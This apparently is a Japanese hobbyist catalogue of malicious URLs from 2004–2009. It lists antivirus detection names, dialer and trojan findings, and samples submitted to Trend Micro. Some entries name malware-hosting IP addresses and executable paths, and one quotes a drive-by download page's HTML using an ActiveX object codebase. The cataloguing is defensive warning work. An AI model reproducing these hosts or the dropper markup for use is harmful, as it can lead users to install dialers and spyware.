通し番号. | URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説 |
← このようになっています。 |
[2009/05/12] | ファイルサイズ:437 KB 。gif 画像ではない。
バスター無反応だが、他社製ウィルス駆除ソフトによっては反応があると思われる。 |
[2009/05/12] | ファイルサイズ:205 KB 。gif 画像ではない。
バスター無反応だが、他社製ウィルス駆除ソフトによっては反応があると思われる。 |
[2008/11/12] | ウィルス名:PAK_GENERIC.001 |
[2008/11/28] | ウィルス名:TROJ_DLOADER.PDC |
[2008/11/28] | ウィルス名:TSPY_MAGANIA.DI |
[2008/11/28] | ウィルス名:TSPY_ONLINEG.GAG |
[2008/11/28] | ウィルス名:TSPY_ONLINEG.GAH |
[2008/11/28] | ウィルス名:TSPY_ONLINEG.FAW |
[2008/11/28] | ウィルス名:MAL_OLGM-6 |
[2008/11/28] | ウィルス名:TSPY_ONLINEG.IA |
[2008/11/28] | ウィルス名:RTKT_AGENT.BAAC |
[2008/11/28] | ウィルス名:TSPY_ONLINEG.IA |
[2008/07/26] | ウィルス名:TSC_GENCLEAN+PAK_Generic.001 |
[2008/09/24] | ウィルス名:CRYP_MANGLED |
[2008/09/24] | ウィルス名:WORM_AGENT.AIAN |
[2008/09/24] | ウィルス名:TSPY_ONLINEG.IA |
[2008/09/24] | ウィルス名:CRYP_MANGLED |
[2008/09/24] | ウィルス名:TSPY_ONLING.GY |
[2008/09/24] | ウィルス名:CRYP_MANGLED |
[2008/09/24] | ウィルス名:TSPY_ONLINEG.IA
[2008/09/24] | ウィルス名:TSPY_ONLINEG.NFR |
[2008/09/24] | ウィルス名:CRYP_MANGLED |
[2008/09/24] | ウィルス名:TSPY_ONLINEG.IA |
[2008/09/24] | ウィルス名:TSPY_ONLINEG.LYD |
[2008/10/20] | ウィルス名:TROJ_DROPPER.HOZ |
[2007/01/11] | 二重拡張子。2006/12/29 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_MULTDROP.FT として検出するよう対応、とのこと。 実際に 2006/12/29 にDLしたファイルからウィルス名:TROJ_MULTDROP.FT を検出することを確認。 しかし、今日改めて当該URLを調べてみるとアクセス禁止:「Access forbidden ! Error 403」になっていた。 サイト自体は生きているので注意。 |
[2005/03/04] | ウィルス名:SPYW_SMALL.AZ |
[2005/12/03] | 再確認。ファイルが無い模様。 |
[2005/09/10] | 踏むと こんな感じ のページ。
しかし、ステータスバーに「ページ http://82.179.166.69/dia152/ を開いています ...」と出ている。 //82.179.166.69/dia152/ ← このURLのある相手サーバーが非力のようで、繋がったり、繋がらなかったりする。 繋がった場合はウィルス名:JAVA_BYTEVER.A-1 を検出する。 |
[2005/08/28] | 真っ白なページだが、何かを呼び出している形跡がある。
これ を表示する。拒否すると少しの間、何も無いが、その後、ウィルス名:JAVA_BYTEVER.A を検出。 |
[2005/08/28] | ウィルス名:JAVA_BYTEVER.A |
[2005/08/28] | バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → TR/Dldr.Small.ask ArcaVir → Trojan.Downloader.Small.Ask Avast → Win32:Small-P AVG Antivirus → Downloader.Small.39.AA BitDefender → Trojan.Downloader.Small.ASK ClamAV → Trojan.Downloader.Small-531 Dr.Web → Trojan.Ants Fortinet → W32/Small.ASK-tr Kaspersky Anti-Virus → Trojan-Downloader.Win32.Small.ask Norman Virus Control → W32/DLoader.EEM VBA32 → Trojan-Downloader.Win32.Small.ask |
[2006/08/04] | 2006/07/31 にトレンドマイクロ社に「java.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_SMALL.CFL として検出するよう対応した。とのこと。 実際に当該URLから「java.exe」ファイルをDLしてウィルス名:TROJ_SMALL.CFL を検出することを確認。 |
[2005/06/20] | ウィルス名:SPYW_SMALL.AZ
実行されるとWindowsフォルダに「OLE32WS.DLL」のファイル名でインストールされる。 |
[2005/06/20] | 「od-padr95.exe」というファイルが落ちてくるがウィルス名:DIAL_PORNDIAL.GT を検出。 |
[2006/01/28] | ウィルス名:ADW_ISTBAR.S |
[2006/08/10] | ウィルス名:JAVA_BYTEVER.AA |
[2009/08/08] | ファイルサイズ:178 KB 。ウィルス名:WORM_SOHANAT.CO |
[2009/08/08] | ファイルサイズ:181 KB 。ウィルス名:WORM_SOHANAD.GD |
[2009/08/08] | ファイルサイズ:105 KB 。ウィルス名:WORM_VB.EIQ |
[2008/07/26] | ウィルス名:TSC_GENCLEAN+TROJ_ZLOB.CNP |
[2008/07/26] | ウィルス名:TSC_GENCLEAN+TROJ_ZLOB.DJU |
[2006/08/10] | ウィルス名:TROJ_AZ.A |
[2006/12/30] | ウィルス名:DIAL_SURFYA.A |
[2007/01/11] | 2006/12/29 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_EGROUP.C として検出するよう対応、とのこと。 実際に 2006/12/29 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:DIAL_EGROUP.C を検出することを確認。 2006/12/29 から今日までのファイルの置き換えは無いと推測される。 |
[2006/12/30] | ウィルス名:DIAL_253.B |
[2007/01/11] | 2006/12/29 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_EGROUP.AN として検出するよう対応、とのこと。 実際に 2006/12/29 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:DIAL_EGROUP.AN を検出することを確認。 2006/12/29 から今日までのファイルの置き換えは無いと推測される。 |
[2007/03/11] | 再確認。ウィルス名:DIALER_CLICKYES2ENTER |
[2007/01/11] | 2006/12/29 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_DERBIZ.A として検出するよう対応、とのこと。 実際に 2006/12/29 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:DIAL_DERBIZ.A を検出することを確認。 2006/12/29 から今日までのファイルの置き換えは無いと推測される。 |
[2006/07/18] | 2006/07/12 にトレンドマイクロ社にファイルを提出、ウイルスパターンファイル 3.569.00 にてウィルス名:DIAL_PORNDIAL.KP として対応とのこと。当ファイルをDLしてウィルスを検出することを確認。 |
[2006/07/18] | 他の方の結果は以下の「」内。
「このサービスはタダでなはい。電話回線繋いで、1分当り$2.99+gstかかります。」というような英文のアラートが表示されたので拒否。」 |
[2006/08/18] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_RAS.GQ として検出するよう対応した、とのこと。 2006/08/12 にDLしたファイルからウィルス名:DIAL_RAS.GQ を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_RAS.GQ を検出することを確認。 |
[2006/08/18] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_RAS.GO として検出するよう対応した、とのこと。 2006/08/12 にDLしたファイルからウィルス名:DIAL_RAS.GO を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_RAS.GO を検出することを確認。 |
[2005/07/20] | ウィルス名:DIAL_PORNDIAL.FB |
[2006/08/18] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_RAS.GT として検出するよう対応した、とのこと。 2006/08/12 にDLしたファイルからウィルス名:DIAL_RAS.GT を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_RAS.GT を検出することを確認。 |
[2006/08/18] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_RAS.GS として検出するよう対応した、とのこと。 2006/08/12 にDLしたファイルからウィルス名:DIAL_RAS.GS を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_RAS.GS を検出することを確認。 |
[2006/08/18] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_RAS.GR として検出するよう対応した、とのこと。 2006/08/12 にDLしたファイルからウィルス名:DIAL_RAS.GR を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_RAS.GR を検出することを確認。 |
[2006/08/10] | ウィルス名:DIAL_FULLGAME.A |
[2006/07/10] | ウィルス名:TROJ_Generic |
[2006/07/10] | ウィルス名:DIAL_SURFYA.A |
[2006/07/10] | ウィルス名:DIAL_253.B |
[2006/07/10] | ウィルス名:DIAL_ASD.A |
[2006/07/10] | ウィルス名:DIAL_ASD.B |
[2006/07/10] | ウィルス名:DIAL_253.B |
[2004/11/20] | IE直踏みではHDDが唸りだし、そのうち落ちる。view-source:を付けてソースを見ると異様なことが分かる。暗号化された部分もあり、更に IFRAME SRC=file:// でハングさせようとしているらしい。 |
[2004/11/26] | 高危険度ウィルスを3つほど持った無地のHPで、踏むと確実にウイルスに感染するらしい。 |
[2004/12/16] | インラインフレームの脆弱性を攻撃するページ。 |
[2004/12/31] | 404を確認。 |
[2005/01/23] | 直踏みでは404でバスター無反応だがこのサイトは生きているらしい。 |
[2005/07/20] | ウィルス名:DIAL_MOLDCON.A |
[2005/07/20] | ウィルス名:DIAL_TOP69.A |
[2009/08/08] | ファイルサイズ:169 KB 。ウィルス名:TROJ_BANLOAD.AWK |
[2007/02/19] | ウィルス名:TROJ_Generic |
[2007/01/11] | 2006/12/29 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.GRA として検出するよう対応、とのこと。 実際に 2006/12/29 にDLしたファイルからウィルス名:TROJ_DLOADER.GRA を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 恐らく、2006/12/29 から今日までの間にファイルの置き換えがあったと推測される。 |
[2007/01/19] | 2007/01/13 にトレンドマイクロ社にファイルを再提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.IDY として検出するよう対応、とのこと。 実際に 2007/01/13 にDLしたファイルからウィルス名:TROJ_DLOADER.IDY を検出することを確認。 しかし、今日改めてDLしたファイルにはバスター無反応。 2007/01/13 から今日までの間にファイルの置き換えがあったと思われる。 |
[2009/03/14] | ウィルス名:TROJ_AGENT.AULZ |
[2005/05/05] | バスター無反応だが以下のアンチウィルスソフトでウィルスを検出。
BitDefender → ウィルス名:BehavesLike:Win32.ExplorerHijack Kaspersky Anti-Virus → ウィルス名:Trojan-Dropper.Win32.Small.tc VBA32 → ウィルス名:Trojan.LdPinch.3 |
[2005/05/05] | ウィルス名:JAVA_BYTEVER.A。このセキュリティ警告 を表示。
「いいえ」を選択すると この小窓 を表示。 小窓の「OK」を押すとHDDが唸り出し、再び このセキュリティ警告 を表示してウィルス名:EXPL_IFRAMEBO.A を表示。 「いいえ」を選択すると今度は こんな警告窓 を表示。 このURLについて、
|
[2005/05/05] | ウィルス名:EXPL_IFRAMEBO.A 。こんな警告窓 を表示。
ソースはほとんど暗号化され、読めないように工夫されている。 |
[2005/05/05] | ウィルス名:JS_PSYME.AF 。ウィルス検出後、すぐにアドレスが「res:///」に変わり、「ページを表示できません」となる。 |
[2005/05/05] | バスター無反応だが以下のアンチウィルスソフトでウィルスを検出。
BitDefender → ウィルス名:BehavesLike:Win32.ExplorerHijack Kaspersky → ウィルス名:Trojan-Dropper.Win32.Small.tc VBA32 → ウィルス名:Trojan.LdPinch.3 |
[2008/10/20] | ウィルス名:TROJ_DLOADE.DSE |
[2008/07/26] | ウィルス名:TSC_GENCLEAN+PAK_Generic.006 |
[2004/12/19] | ウィルス名:JAVA_BYTEVER.A+JS_SMALL.D |
[2009/03/15] | ファイルサイズ:36 KB 。バスター無反応だが、他社製ウィルス駆除ソフトによっては反応する。 |
[2005/12/07] | 踏むと「avir.cn.bin」という名の拡張子:BIN のファイルが落ちてくる。
バスター無反応だが、以下のアンチウィルスソフトで反応。かなり危険なものと判断。 AVG → Klone BitDefender → GenPack:Trojan.Downloader.Small.BFZ Dr.Web → Trojan.Galapoper Fortinet → W32/KlonePacked.B-tr Kaspersky→ Packed.Win32.Klone.b NOD32 → Win32/TrojanDownloader.Small.AVT Norman Virus Control → Sandbox: W32/Malware; [ General information ] VBA32 → Trojan-Downloader.Win32.Small.bwr |
[2005/04/07] | ウィルス名:ADW_LOOK2ME.G |
[2005/11/25] | 以下のアンチウィルスソフトで反応。
AntiVir → Trojan/Dldr.Small.ayl.0 BitDefender → Trojan.Downloader.Small.AYL ClamAV → Dialer-306 Dr.Web → Trojan.DownLoader.3080 Kaspersky → Trojan-Downloader.Win32.Small.ayl NOD32 → Win32/TrojanDownloader.Small.AYL Norman Virus Control → W32/Downloader UNA → TrojanDownloader.Win32.Small VBA32 → Trojan-Downloader.Win32.Small.ayl |
[2005/06/03] | 中身はダイヤラー。バスター無反応だが、以下のアンチウィルスソフトで反応。
BitDefender → Trojan.Dialer.HT ClamAV → Dialer-306 NOD32 → Win32/Dialer.NAD Kaspersky Anti-Virus → Trojan.Win32.Dialer.ht VBA32 → Embedded.Trojan-Downloader.Win32.Agent.li |
[2005/04/07] | 踏むと真っ青なページ。このセキュリティ警告 を表示し、「キャンセル」すると「実行しましたが、ページでエラーが発生しました。」となる。
これは//66.117.37.5/1/gdnJP155.exeをアプレット実行しようとするためであるが、IE最新バッチなら未実行で終わる。 |
[2005/11/25] | 再確認。踏むと こんな感じ のページだが、ダイアログを表示し、何かをインストールするよう促してくる。
このページのソースは以下である。 <html><head><title>Download</title> <body bgcolor=#2c62a0 text=#ffffff onselectstart='return false;' ondragstart='return false;'> <object onerror='ErrorActiveX();' id="A" classid="CLSID:3e77f89d-488d-3318-7a9e-7750643b1c3b" codebase="1/gdnJP155.exe"></object> </body></html> ↑ ソース内の「gdnJP155.exe」は いくつかのアンチウィルスソフトで反応する。 |
[2005/06/03] | 踏むと真っ青なページだが、左上のほうに何かURLを呼び出している形跡あり。
ウィルス名:JAVA_BYTEVER.A。こんな警告窓 が出る。 調べると、呼び出しているURLは//www.grannymax.com/test.htm また、objectタグを使って//66.117.37.5/1/gdnJP263.exeを実行しようとしている。 |
[2005/06/03] | 再び確認してみると、object実行で1を、IFRAMEタグで2を呼び出す。
1、//66.117.37.5/1/gdnFR263.exe ← ダイヤラー。 2、//www.grannymax.com/test.htm ← 真っ白なページ。 |
[2009/08/08] | ファイルサイズ:21.0 KB 。ウィルス名:TROJ_DLOADE.BQG |
[2009/08/08] | ファイルサイズ:12.0 KB 。ウィルス名:TROJ_GENERIC |
[2009/08/08] | ファイルサイズ:19.5 KB 。ウィルス名:TROJ_ISTBAR.DM |
[2009/08/08] | ファイルサイズ:41.5 KB 。ウィルス名:TROJ_DLOADER.CHX |
[2005/03/07] | 踏むと count4.jar というJARファイルをDLさせようとしてくる。だが実際はZIPファイル。
DLして解凍するとウィルス名:JAVA_BYTEVER.A が4つ検出される。 |
[2006/11/16] | ウィルス名:DIAL_ADPOWER.N |
[2008/10/20] | ウィルス名:POSSIBLE_OBFUS-2 |
[2006/08/10] | ウィルス名:TSPY_BANKER.BIW |
[2006/08/10] | ウィルス名:TSPY_BANKER.BRB |
[2006/08/10] | ウィルス名:TSPY_Generic |
[2005/01/25] | ウィルス名:TROJ_SMALL.AA |
[2005/05/30] | 踏むと海外のリンク集のようなサイト。バスター無反応。アンチドートでウィルス名:Exploit.VBS.Phel.i を検出。
IFRAMEタグで以下の4つのURLを呼び出している。 //66.230.146.2/uk/lasse2.html ← このURL解説を参照。 //66.230.146.2/jimb_it.php ← 何も無し。 //66.230.146.2/gec_uk.php ← 何も無し。 //66.230.146.2/g-way.html ← 何も無し。 |
[2005/05/30] | 真っ白なページ。ソースにコード変換している部分があるが、その中で //82.179.166.69/dia218/ を実行しようとしている。 |
[2005/06/09] | 数十回踏んで確認。以下のどれかに0秒REFRESHで飛ぶ。飛び先は他にもあるかも。
|
[2005/12/24] | 以下のどれかに飛ぶ。探せばもっとあると思われる。
|
[2005/12/24] | 下のURLに飛ぶので、そちらのURL List解説を参照。
//66.230.175.139/sout.php?fc=38&backurl=http%3A%2F%2F66.230.175.142%2Ftds%2Fback.php%3Fid%3D210 |
[2007/04/22] | ウィルス名:DIALER_NEWDIALSPA |
[2007/04/22] | ウィルス名:DIALER_TELEASP |
[2006/08/10] | ウィルス名:DIAL_DIALER.HW |
[2006/08/29] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_Generic.Z として検出するよう対応、とのこと。 2006/08/12 にDLしたファイルからウィルス名:TROJ_Generic.Z を検出することを確認。 また、今日改めて当該URLからファイルをDLしてみてもウィルス名:TROJ_Generic.Z を検出することを確認。 |
[2006/08/10] | ウィルス名:DIAL_CONNECT.D |
[2006/08/29] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_Generic.Z として検出するよう対応、とのこと。 2006/08/12 にDLしたファイルからウィルス名:TROJ_Generic.Z を検出することを確認。 また、今日改めて当該URLからファイルをDLしてみてもウィルス名:TROJ_Generic.Z を検出することを確認。 |
[2006/09/02] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
2006/08/29 にその結果の連絡があり、ウィルス名:DIAL_TELEASP.C として検出するよう対応、とのこと。 2006/08/12 にDLしたファイルからウィルス名:DIAL_TELEASP.C を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_TELEASP.C を検出することを確認。 |
[2006/08/10] | ウィルス名:DIAL_PORNDIAL.AN |
[2006/09/02] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
2006/08/29 にその結果の連絡があり、ウィルス名:DIAL_TELEASP.E として検出するよう対応、とのこと。 2006/08/12 にDLしたファイルからウィルス名:DIAL_TELEASP.E を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_TELEASP.E を検出することを確認。 |
[2006/09/02] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
2006/08/29 にその結果の連絡があり、ウィルス名:DIAL_TELEASP.D として検出するよう対応、とのこと。 2006/08/12 にDLしたファイルからウィルス名:DIAL_TELEASP.D を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_TELEASP.D を検出することを確認。 |
[2006/08/10] | ウィルス名:DIAL_PORNDIAL.BE |
[2006/09/02] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
2006/08/29 にその結果の連絡があり、ウィルス名:DIAL_TELEASP.C として検出するよう対応、とのこと。 2006/08/12 にDLしたファイルからウィルス名:DIAL_TELEASP.C を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_TELEASP.C を検出することを確認。 |
[2006/08/10] | ウィルス名:DIAL_PORNDIAL.BF |
[2007/04/22] | ウィルス名:TROJ_GENERIC |
[2007/04/22] | ウィルス名:DIALER_TELEASP |
[2007/01/11] | 2006/12/29 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_DIALER.MW として検出するよう対応、とのこと。 実際に 2006/12/29 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:DIAL_DIALER.MW を検出することを確認。 2006/12/29 から今日までのファイルの置き換えは無いと推測される。 |
[2007/01/11] | 2006/12/29 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_DIALER.MX として検出するよう対応、とのこと。 実際に 2006/12/29 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:DIAL_DIALER.MX を検出することを確認。 2006/12/29 から今日までのファイルの置き換えは無いと推測される。 |
[2005/04/16] | ウィルス名:ADW_GLOBOSRCH.C |
[2005/04/16] | バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。
Avast → ウィルス名:Win32:Trojan-gen. {Other} AVG Antivirus → ウィルス名:Startpage.16.BC Dr.Web → ウィルス名:Trojan.StartPage.630 Kaspersky Anti-Virus → ウィルス名:AdWare.Giga.b mks_vir → ウィルス名:Gigab.A1 Norman Virus Control → ウィルス名:Gagabar.A VBA32 → ウィルス名:AdWare.Giga.b |
[2006/08/04] | 2006/07/31 にトレンドマイクロ社に「gigasoft_259.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:ADW_GIGABAR.B として検出するよう対応した。とのこと。 実際に当該URLから「gigasoft_259.exe」ファイルをDLしてウィルス名:ADW_GIGABAR.B を検出することを確認。 |
[2005/04/16] | ウィルス名:ADW_GLOBOSRCH.A |
[2005/10/02] | 結論から言うと、このURLはPC無害。海外セキュリティ会社のサイトの1ページらしい。以下は他の方の結果。
「踏んだ瞬間、自分のPCのファイルとフォルダを勝手に検索された上に表示までされました。リモートアタック掛けられるかも知れません。但しVBの反応はなしです。」 「洋セキュリティソフト会社の悪質な宣伝です。」 「フラのアクションスクリプトで、自分のPCのfavorites history cookie desktop cacheを表示させる。」 「IEで踏むと、お気に入り、履歴、クッキー等のフォルダ内容を表示されて、英語で「エロサイトなどを見てるあなたのプライバシーはこのように筒抜けです。ぜひ対策ソフトを入れてください」的なことを言ってソフトの宣伝をしています。」 |
[2005/03/08] | ウィルス名:ADW_RBLAST.E を検出するが、ウィルス名:TROJ_ISTBAR.BJ を検出する場合もあるらしい。 |
[2005/02/28] | このページは無害だが、ダークロリータ系URL( jpg偽装URL )を踏んでスタートページがこのURLになってしまう場合あり。 |
[2009/08/06] | ファイルサイズ:259 KB 。バスター無反応だが、他社製ウィルス駆除ソフトの多くで反応がある。 |
[2008/11/27] | ウィルス名:TROJ_OBFUSCA.SD |
[2006/10/16] | ウィルス名:JS_EXCEPTION.GEN |
[2005/07/23] | 踏むとウィルス名:JS_EXCEPTION.GEN を検出。アドレスが以下のアドレスになる。
//67.15.114.122/my_stat_s2.php?id=-[自分のリモートホスト] |
[2005/02/24] | ウィルス名:TROJ_GHETTO.A |
[2005/10/11] | 再確認。ウィルスファイルが置き換えられているかも。ウィルス名:TROJ_AGENT.QI を検出。 |
[2005/10/11] | ウィルス名:TROJ_AGENT.QI |
[2008/10/20] | ウィルス名:WORM_HAMWEQ.AM |
[2009/03/14] | ウィルス名:TROJ_SHEUR.CJZ |
[2008/10/20] | ウィルス名:TROJ_PAKES.CU |
[2008/10/20] | ウィルス名:TROJ_QHOST.PE |
[2006/09/08] | 2006/09/02 にトレンドマイクロ社にDL+解凍して現れた「sexsoftware.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_BILLPRAYE.G として検出するよう対応、とのこと。 2006/09/02 にDLしたファイルからウィルス名:DIAL_BILLPRAYE.G を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_BILLPRAYE.G を検出することを確認。 |
[2006/08/27] | ウィルス名:DIAL_PORNDIAL.BL |
[2006/10/19] | ウィルス名:DIAL_BILLPRAYE.B |
[2006/11/27] | ウィルス名:DIAL_PORNDIAL.BL |
[2006/09/01] | 2006/08/26 にトレンドマイクロ社にDL+解凍して現れた「sexsoftware.exe」ファイルを提出。
2006/08/31 にその結果の連絡があり、ウィルス名:DIAL_BILLPRAYE.C として検出するよう対応、とのこと。 2006/08/26 にDLしたファイルからウィルス名:DIAL_BILLPRAYE.C を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_BILLPRAYE.C を検出することを確認。 |
[2007/02/19] | ウィルス名:Possible_Virus |
[2008/07/26] | ウィルス名:TSC_GENCLEAN+ADW_FZQUEST.EAH |
[2005/03/07] | ウィルス名:TROJ_KREPPER.E |
[2005/10/11] | ウィルス名:ADW_ESEPOR.D |
[2005/03/28] | ウィルス名:EXPL_IFRAMEBO.A |
[2005/10/11] | ウィルス名:CHM_DSMALL.A |
[2008/07/26] | ウィルス名:CHM_DROPPER.CKK |
[2005/04/09] | ウィルス名:JAVA_BYTEVER.A |
[2005/04/12] | ウィルス名:JAVA_BYTEVER.A |
[2005/01/10] | ウィルス名:JAVA_BYTEVER.A |
[2005/02/16] | 他の方が踏んだ場合、(2ちゃんねる・セキュリティ板より引用)
このサイトを踏んだらJAVA_BYTEVER.Aというスパイウェアに感染してしまいました。 当時Windows XPでSP2はインストールしていませんでした。 慌ててSP2をインストールし、マイクロトレンドのウィルスバスター2005の無償版でとりあえずJAVA_BYTEVER.A は隔離できたようなんですが、まだ解決していない問題がいくつかあります。 1、ホームページを「about:blank」にしているにもかかわらず、IEを開くと こんなサイト が開きます。 [uninstall homepage]をクリックしても この広告サイト に移ります。 2、時折勝手に このアダルトサイトのポップアップ が開きます。 3、時折勝手に このメッセージ が開き、[YES]ボタンを押すと こんなサイト に移ります。 一見マイクロソフトのページのように見えますが実はそうではないようで、[Download Recomemnded Software]をクリックすると この広告サイト に移ります。 4、時折勝手に こんなサイト が開きます。 バルーンをクリックすると これ が表示され、[REMOVAL TOOLS]をクリックしても この広告サイト に移ります。 使用OS:Windows XP Home Edition 使用ブラウザ:IE6.0.2900.2180.xpsp_sp2rtm.04083-2158 使用PC:DELL DEMENSION 8300 |
[2005/03/21] | 上記4番目の画像で、マカフィー社のウィルス画像辞典のウィルス名:AdClicker-BW のところに同じものが掲載されている、との情報あり。 そのウィルス名:AdClicker-BWの詳細は こちら を参照。 |
[2005/05/22] | ウィルス名:TROJ_ANICMOO.G+JAVA_BYTEVER.A+JAVA_BYTEVER.C
IFRAMEタグで //69.50.190.131/?to=nan11&from=in を呼ぶ。このURL解説も参照。 |
[2005/05/25] | このサイトはIFRAMEタグを使って以下のURLを呼び出す。詳細はこのURL解説も参照。
//69.50.190.131/?to=nan40&from=in |
[2005/03/28] | //69.50.190.131/?to=nmid&from=in に飛び、ウィルス名:JAVA_BYTEVER.A を検出。 |
[2006/08/11] | 2006/08/04 にトレンドマイクロ社に「devil01.chm」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_CODEBASE.CC として検出するよう対応したとのこと。 2006/08/04 にDLした「devil01.chm」ファイルからウィルス名:CHM_CODEBASE.CC を検出することを確認。 また、改めて当該URL から「devil01.chm」ファイルをDLしてみてもウィルス名:CHM_CODEBASE.CC を検出することを確認。 |
[2006/07/28] | 2006/07/24 にトレンドマイクロ社にchmファイルを提出。今日、その結果の連絡があり、その結果は以下。
「ウイルスパターンファイル 3.595.00 にてウィルス名:CHM_CODEBASE.BP として対応しました。」 実際にファイルをDLしてウィルス名:CHM_CODEBASE.BP を検出することを確認。 |
[2006/08/11] | 2006/08/04 にトレンドマイクロ社に「pop02.chm」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_CODEBASE.CH として検出するよう対応したとのこと。 2006/08/04 にDLした「pop02.chm」ファイルからウィルス名:CHM_CODEBASE.CH を検出することを確認。 また、改めて当該URL から「pop02.chm」ファイルをDLしてみてもウィルス名:CHM_CODEBASE.CH を検出することを確認。 |
[2006/08/11] | 2006/08/04 にトレンドマイクロ社に「pop03.chm」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_CODEBASE.CI として検出するよう対応したとのこと。 2006/08/04 にDLした「pop03.chm」ファイルからウィルス名:CHM_CODEBASE.CI を検出することを確認。 また、改めて当該URL から「pop03.chm」ファイルをDLしてみてもウィルス名:CHM_CODEBASE.CI を検出することを確認。 |
[2006/08/11] | 2006/08/04 にトレンドマイクロ社に「pop04.chm」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_CODEBASE.CJ として検出するよう対応したとのこと。 2006/08/04 にDLした「pop04.chm」ファイルからウィルス名:CHM_CODEBASE.CJ を検出することを確認。 また、改めて当該URL から「pop04.chm」ファイルをDLしてみてもウィルス名:CHM_CODEBASE.CJ を検出することを確認。 |
[2006/08/11] | 2006/08/04 にトレンドマイクロ社に「pop05.chm」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_CODEBASE.CK として検出するよう対応したとのこと。 2006/08/04 にDLした「pop05.chm」ファイルからウィルス名:CHM_CODEBASE.CK を検出することを確認。 また、改めて当該URL から「pop05.chm」ファイルをDLしてみてもウィルス名:CHM_CODEBASE.CK を検出することを確認。 |
[2006/07/28] | 2006/07/24 にトレンドマイクロ社にchmファイルを提出。今日、その結果の連絡があり、その結果は以下。
「ウイルスパターンファイル 3.595.00 にてウィルス名:CHM_CODEBASE.BT として対応しました。」 実際にファイルをDLしてウィルス名:CHM_CODEBASE.BT を検出することを確認。 |
[2006/07/28] | 2006/07/24 にトレンドマイクロ社にchmファイルを提出。今日、その結果の連絡があり、その結果は以下。
「ウイルスパターンファイル 3.595.00 にてウィルス名:CHM_CODEBASE.BX として対応しました。」 実際にファイルをDLしてウィルス名:CHM_CODEBASE.BX を検出することを確認。 |
[2006/08/11] | 2006/08/04 にトレンドマイクロ社に「sext03.chm」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_CODEBASE.CL として検出するよう対応したとのこと。 2006/08/04 にDLした「sext03.chm」ファイルからウィルス名:CHM_CODEBASE.CL を検出することを確認。 また、改めて当該URL から「sext03.chm」ファイルをDLしてみてもウィルス名:CHM_CODEBASE.CL を検出することを確認。 |
[2006/08/04] | 2006/07/31 にトレンドマイクロ社に「sext04.chm」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_STARTPAG.BW として検出するよう対応した。とのこと。 実際に当該URLから「sext04.chm」ファイルをDLしてウィルス名:CHM_STARTPAG.BW を検出することを確認。 |
[2006/08/11] | 2006/08/04 にトレンドマイクロ社に「sext05.chm」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_CODEBASE.CM として検出するよう対応したとのこと。 2006/08/04 にDLした「sext05.chm」ファイルからウィルス名:CHM_CODEBASE.CM を検出することを確認。 また、改めて当該URL から「sext05.chm」ファイルをDLしてみてもウィルス名:CHM_CODEBASE.CM を検出することを確認。 |
[2005/01/09] | ウィルス名:JAVA_BYTEVER.A |
[2005/03/08] | 真っ白なページだがウィルス名:JAVA_BYTEVER.A を検出。 |
[2006/08/18] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
